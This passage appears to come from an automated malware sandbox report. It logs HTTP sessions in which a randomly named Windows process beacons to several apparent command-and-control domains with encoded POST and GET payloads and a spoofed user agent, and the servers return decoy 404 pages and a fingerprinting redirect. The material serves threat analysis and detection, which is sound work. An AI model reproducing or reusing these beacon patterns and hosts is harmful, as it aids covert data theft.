                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyItiHTC6XWAoyeUQAwjwvVicT4cNkubejQl17sVz8x5Jp+f7Q9CTJPnGdvXT5FrQ0ePPDi8A+WLqjo1AF7yVK+ZHFLAA493mdYY5KE8xUGZVczOP4WvSScNhVRubkqzVUhfu5I4P0LwKwGTpXeP2hUaowGagusVMteIQdRIvplw4vg=
                                      Aug 26, 2024 18:28:47.842317104 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:47 GMT
                                      Server: Apache
                                      Content-Length: 13840
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      19 | 192.168.2.4 | 49757 | 66.29.149.180 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:28:49.816984892 CEST | 10835 | OUT | POST /f9bc/ HTTP/1.1
                                      Host: www.jaxo.xyz
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.jaxo.xyz
                                      Referer: http://www.jaxo.xyz/f9bc/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l= [TRUNCATED]
                                      Aug 26, 2024 18:28:50.436723948 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:50 GMT
                                      Server: Apache
                                      Content-Length: 13840
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      20 | 192.168.2.4 | 49758 | 66.29.149.180 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:28:52.362318993 CEST | 478 | OUT | GET /f9bc/?3L9l=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.jaxo.xyz
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:28:53.260545015 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:52 GMT
                                      Server: Apache
                                      Content-Length: 13840
                                      Connection: close
                                      Content-Type: text/html; charset=utf-8
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      21 | 192.168.2.4 | 49759 | 103.224.182.242 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:28:58.619807959 CEST | 742 | OUT | POST /647x/ HTTP/1.1
                                      Host: www.xforum.tech
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.xforum.tech
                                      Referer: http://www.xforum.tech/647x/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=Ily3CeU2s+qA8gh5ukP0lUCnbukw9i/Y6tgW+W9BI4hG61kQoqtUMaGdI6vTDyNe7ebJ+ANm/coVSjJtygMWixDVydz2j08YVwUGtOK6ScszZE9db3mh+kswfVnFEk+zdAkc8sL/G9WXNtd66OnygOCXsPhAnedtlaKPof8J4BXtars/rj9QPO0ntd8mfj0fLQ==
                                      Aug 26, 2024 18:28:59.227731943 CEST | 872 | IN | HTTP/1.1 200 OK
                                      date: Mon, 26 Aug 2024 16:28:59 GMT
                                      server: Apache
                                      set-cookie: __tad=1724689739.4296456; expires=Thu, 24-Aug-2034 16:28:59 GMT; Max-Age=315360000
                                      vary: Accept-Encoding
                                      content-encoding: gzip
                                      content-length: 577
                                      content-type: text/html; charset=UTF-8
                                      connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      22 | 192.168.2.4 | 49760 | 103.224.182.242 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:29:01.161868095 CEST | 762 | OUT | POST /647x/ HTTP/1.1
                                      Host: www.xforum.tech
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.xforum.tech
                                      Referer: http://www.xforum.tech/647x/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKVG6X8QvbtUNaGdGavKHyNr7ee8+FNm/c8VSiVtyXwVjhDbrNz0n08YVwUGtKiESfczZ0tdcmmihUs3W1nFAk+3dAku8tnRG/uXNsN66fnxqOCVzfgqgbsItaX0hOsI6gjvbt9l6ScHdOQUwa1SSgJWQcp2H4YFK2Oqqv0FKo1izDY=
                                      Aug 26, 2024 18:29:01.796082973 CEST | 872 | IN | HTTP/1.1 200 OK
                                      date: Mon, 26 Aug 2024 16:29:01 GMT
                                      server: Apache
                                      set-cookie: __tad=1724689741.3310780; expires=Thu, 24-Aug-2034 16:29:01 GMT; Max-Age=315360000
                                      vary: Accept-Encoding
                                      content-encoding: gzip
                                      content-length: 577
                                      content-type: text/html; charset=UTF-8
                                      connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      23 | 192.168.2.4 | 49761 | 103.224.182.242 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:29:03.811546087 CEST | 10844 | OUT | POST /647x/ HTTP/1.1
                                      Host: www.xforum.tech
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.xforum.tech
                                      Referer: http://www.xforum.tech/647x/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:29:04.481363058 CEST | 872 | IN | HTTP/1.1 200 OK
                                      date: Mon, 26 Aug 2024 16:29:04 GMT
                                      server: Apache
                                      set-cookie: __tad=1724689744.5631408; expires=Thu, 24-Aug-2034 16:29:04 GMT; Max-Age=315360000
                                      vary: Accept-Encoding
                                      content-encoding: gzip
                                      content-length: 577
                                      content-type: text/html; charset=UTF-8
                                      connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      24 | 192.168.2.4 | 49762 | 103.224.182.242 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:29:06.358953953 CEST | 481 | OUT | GET /647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.xforum.tech
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:29:06.991321087 CEST | 1236 | IN | HTTP/1.1 200 OK
                                      date: Mon, 26 Aug 2024 16:29:06 GMT
                                      server: Apache
                                      set-cookie: __tad=1724689746.5091635; expires=Thu, 24-Aug-2034 16:29:06 GMT; Max-Age=315360000
                                      vary: Accept-Encoding
                                      content-length: 1476
                                      content-type: text/html; charset=UTF-8
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 78 66 6f 72 75 6d 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 33 4c 39 6c 3d 46 6e 61 58 42 6f 78 35 34 2b 61 67 37 67 35 69 77 6d 50 36 6c 45 75 61 59 72 4e 79 39 78 66 34 33 65 52 63 68 68 4a 79 48 63 78 6a 32 6e 42 73 76 5a 5a 54 54 6f 66 42 44 75 44 72 54 52 78 44 77 4a 53 2f 78 6c 78 71 32 38 77 46 62 43 4a 37 6f 6b 55 70 68 30 50 59 70 4f 47 75 73 52 67 42 54 43 74 69 30 2b 47 71 52 66 39 4e 59 45 4a 33 4d 33 6e 49 67 33 73 3d 26 6b 5a 72 30 3d 68 74 2d 6c 45 6c 79 68 26 [TRUNCATED]
                                      Data Ascii: <html><head><title>xforum.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.xforum.tech/647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyh&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" tex
                                      Aug 26, 2024 18:29:06.991385937 CEST | 512 | IN | Data Raw: 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 33 4c 39
                                      Data Ascii: t="#000000"><div style='display: none;'><a href='http://www.xforum.tech/647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyh&fp=-3'>Click here to ent


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      25 | 192.168.2.4 | 49763 | 18.183.3.45 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:29:12.293653011 CEST | 763 | OUT | POST /l90v/ HTTP/1.1
                                      Host: www.cannulafactory.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.cannulafactory.top
                                      Referer: http://www.cannulafactory.top/l90v/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 66 54 67 75 6c 36 77 7a 79 2f 41 41 76 44 6d 76 72 69 37 37 77 6b 75 79 56 6d 4f 50 59 41 56 45 72 38 37 71 5a 4c 33 57 63 37 34 69 48 30 65 45 62 4a 4b 6e 6a 56 6b 73 58 59 67 6b 50 73 6c 6b 4c 45 6e 33 76 36 44 59 4f 52 6d 61 2f 2f 69 54 52 70 69 58 2f 32 7a 57 6d 75 35 69 61 4f 68 77 44 6e 5a 53 57 50 55 7a 72 77 57 6c 51 6a 77 70 4a 6f 64 42 30 54 6a 2f 6b 31 32 71 7a 38 41 7a 39 66 6d 76 45 46 41 2f 6e 38 67 48 32 59 6e 56 6e 33 65 61 76 55 63 67 44 35 52 6d 37 6d 4b 2b 30 64 56 34 66 58 65 39 6c 47 33 65 43 77 35 48 45 76 6a 6c 53 51 3d 3d
                                      Data Ascii: 3L9l=37FT9IHDPOAKfTgul6wzy/AAvDmvri77wkuyVmOPYAVEr87qZL3Wc74iH0eEbJKnjVksXYgkPslkLEn3v6DYORma//iTRpiX/2zWmu5iaOhwDnZSWPUzrwWlQjwpJodB0Tj/k12qz8Az9fmvEFA/n8gH2YnVn3eavUcgD5Rm7mK+0dV4fXe9lG3eCw5HEvjlSQ==
                                      Aug 26, 2024 18:29:13.210680008 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 26 Aug 2024 16:29:13 GMT
                                      Content-Type: text/html
                                      Content-Length: 3971
                                      Connection: close
                                      ETag: "6526681e-f83"
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                      Aug 26, 2024 18:29:13.210710049 CEST | 1236 | IN | Data Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                                      Aug 26, 2024 18:29:13.210721016 CEST | 448 | IN | Data Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                                      Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                                      Aug 26, 2024 18:29:13.210752964 CEST | 1224 | IN | Data Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      26 | 192.168.2.4 | 49764 | 18.183.3.45 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:29:14.831312895 CEST | 783 | OUT | POST /l90v/ HTTP/1.1
                                      Host: www.cannulafactory.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.cannulafactory.top
                                      Referer: http://www.cannulafactory.top/l90v/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 57 6c 45 6f 64 4c 71 4c 61 33 57 5a 37 34 69 50 55 65 42 55 70 4b 73 6a 56 6f 43 58 5a 63 6b 50 6f 4e 6b 4c 41 6a 33 75 4a 62 5a 4f 42 6d 63 79 66 69 52 66 4a 69 58 2f 32 7a 57 6d 75 64 63 61 4f 70 77 41 58 4a 53 55 74 73 77 30 41 57 6d 52 6a 77 70 66 59 64 46 30 54 6a 4a 6b 30 72 4e 7a 2b 6f 7a 39 61 61 76 45 52 63 38 73 38 67 42 70 49 6d 6c 6d 6b 43 53 32 6c 73 78 4b 34 45 43 6b 30 65 34 78 62 45 69 4f 6d 2f 71 33 47 54 74 66 33 77 7a 4a 73 65 73 4a 52 42 47 6c 37 35 76 4b 45 51 73 61 52 63 53 67 2f 32 6e 43 69 41 3d
                                      Data Ascii: 3L9l=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYWlEodLqLa3WZ74iPUeBUpKsjVoCXZckPoNkLAj3uJbZOBmcyfiRfJiX/2zWmudcaOpwAXJSUtsw0AWmRjwpfYdF0TjJk0rNz+oz9aavERc8s8gBpImlmkCS2lsxK4ECk0e4xbEiOm/q3GTtf3wzJsesJRBGl75vKEQsaRcSg/2nCiA=
                                      Aug 26, 2024 18:29:15.767393112 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 26 Aug 2024 16:29:15 GMT
                                      Content-Type: text/html
                                      Content-Length: 3971
                                      Connection: close
                                      ETag: "6526681e-f83"
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                      Aug 26, 2024 18:29:15.767405987 CEST | 1236 | IN | Data Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                                      Aug 26, 2024 18:29:15.767427921 CEST | 1236 | IN | Data Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                                      Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
